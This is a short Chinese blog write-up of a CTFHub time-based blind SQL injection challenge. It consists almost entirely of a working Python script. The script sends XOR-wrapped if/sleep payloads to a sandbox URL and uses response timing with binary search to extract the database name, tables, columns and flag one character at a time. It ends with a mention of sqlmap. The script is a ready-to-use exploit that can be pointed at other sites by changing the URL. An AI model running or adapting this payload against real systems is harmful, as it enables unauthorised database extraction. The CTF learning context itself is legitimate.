ctfhub[时间盲注]

ctfhub[时间盲注]

这道题都说了是时间盲注，那就直接时间盲注吧

同样是用异或来进行时间的注入

脚本如下：

# -*- coding:utf-8 -*-
import requests
import time
flag = ""
for i in range(1,50):
    min=32
    max=127
    mid=(min+max)//2
    while min<max:
        starttime = time.time()
        #pa = '1^if(ascii(substr(database(),{},1))>{},sleep(2),-1)^1'.format(str(i),str(mid)) 爆库
        #pa = "1^if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),{},1))>{},sleep(2),-1)^1".format(str(i),str(mid)) 爆表
        #pa = "1^if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid)) 爆列
        pa = "1^if(ascii(substr((select group_concat(flag) from flag),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid))
        url = "http://challenge-5f35b16863cadad6.sandbox.ctfhub.com:10800?id="
        ur=url+pa
        res = requests.get(ur)
        if time.time() - starttime > 2:
            min=mid+1
        else:
            max=mid
        mid = (min + max)//2
    flag+=chr(mid)
    print(flag)

           

sqlmap的话也可以，这里就不展示了，都挺简单的，上一篇博客也说了sqlmap的用法：

sqlmap